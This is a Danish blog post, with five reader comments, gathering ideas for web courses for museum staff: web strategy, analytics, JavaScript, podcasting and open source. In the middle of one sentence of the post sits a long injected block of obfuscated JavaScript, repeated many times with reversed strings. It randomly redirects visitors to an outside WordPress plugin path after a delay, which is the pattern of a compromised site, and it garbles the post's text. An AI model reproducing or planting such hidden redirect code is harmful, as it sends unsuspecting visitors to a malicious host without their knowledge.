Ideer til web-kurser i ODM-regi

Søren Friis Møller i ODM vil meget gerne høre fra os alle med ideer til webrelaterede kurser i ODM-regi.

Mine umiddelbare og hurtige ideer kunne være workshop om webstrategier (hvordan integrerer vi web 2.0 elementer – gider brugerne, som Rune spørger i en anden tråd), skal vi kun formidle på egne websites eller skal vi udnytte fx wikipedia og lignende? informationsarkitektur, statistik kunne også være ideer.

– og hvad med mere “hands-on” agtige ting, hvor man fx sammen med andre arbejder på egne websites. Jeg har – i min arkivalske fortid – lavet den slags, hvilket der faktisk var en vis interesse for. Det var helt tilbage da jeg var i lokalarkivverdenen, i så gamle dage at man sad og skrev sin side med koder i notepad. Men kunne sessioner, hvor man fx arbejdede med at implementere Google Analytics, lege med små Javascripts til kvisser, opsatte blogs etc. være en idé? Og hvad med fx billedbehandling og kurser i Acrobat-writer? Podcasting, mobil…?

Vi kommer også til at vende det på toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torsdag, men byd endelig ind med gode ideer og kvalificering til de ting jeg – bare hurtigt – har nævnt her.

8 comments to “Ideer til web-kurser i ODM-regi”
  1. Et par hurtige skud fra hoften:

    Hvad er Open Source – og kan vi bruge det til noget?

    Hvad skal vi med W3C? og hvofor er det en god idé at være bevidst om standarder på området?

    Men derudover også det helt praktiske hands-on betonede, som du også foreslår. Der er rigeligt med emner at tage af!

    Måske man kunne stable en lille hotlist og afstemning på benene på et tidspunkt?

    Problemet med kurser (og efteruddannelse i museumsverdnen generelt) er jo nok, som altid, at de rykkes ned i prioriteringsrækken når der skal tages penge fra museets budget. Det er ikke fordi man ikke er interesseret 😉

  2. Lige en hurtig kommentar :
    Det lyder rigtig godt, at ODM gerne vil gå ind i det med kurser.
    Jeg kunne godt tænke mig tekniske kurser, hvor der blev lagt vægt på det med at bruge og opbygge Java script o.lign. Problemet med IT er mange gange, at det er så begrænset, hvad man kan gøre selv, og så bliver det pludseligt dyrt i et projekt at skulle have hjælp. Det kunne være interessant og god hjælp at have kurser i de mere simple ting, som man selv kunne sætte op. Herunder er tekniske løsninger til mobilformidling også et overordentligt relevant emne. Desuden mener jeg, at brugen af IT i udstillinger og formidling er en meget relevant faglig diskussion, som vi burde gøre noget ud af.

    Susanne
    Furesø Museer

  3. Jeg tror det er vigtigt at tænke nogle forskellige niveauer ind – mange kunne måske godt bruge et basismodul med html, upload af filer osv. – “vedligehold din egen hjemmeside” – mens andre måske er mere til open source, podcasting osv. – det jeg mener er at man (ODM) måske burde lave en indledende undersøgelse af de behov der faktisk er i museumslandskabet, evt via en hurtig survey på ODM’s site.

  4. – men hvis jeg skal komme med umiddelbare idéer, så f.eks. integration af den fysiske udstilling og digitale medier, samt sociale mediers betydning for museerne, teoretisk og praktisk.

  5. spændende at følge med i diskussionen. Hvordan gik det egentlig med den undersøgelse, som blev lavet på det internationale formidlingsseminar? Hvis der er input til niveauopdeling, vil jeg også meget gerne høre om det – det er jo vigtigt, at vi rammer så præcist som muligt.

Skriv et svar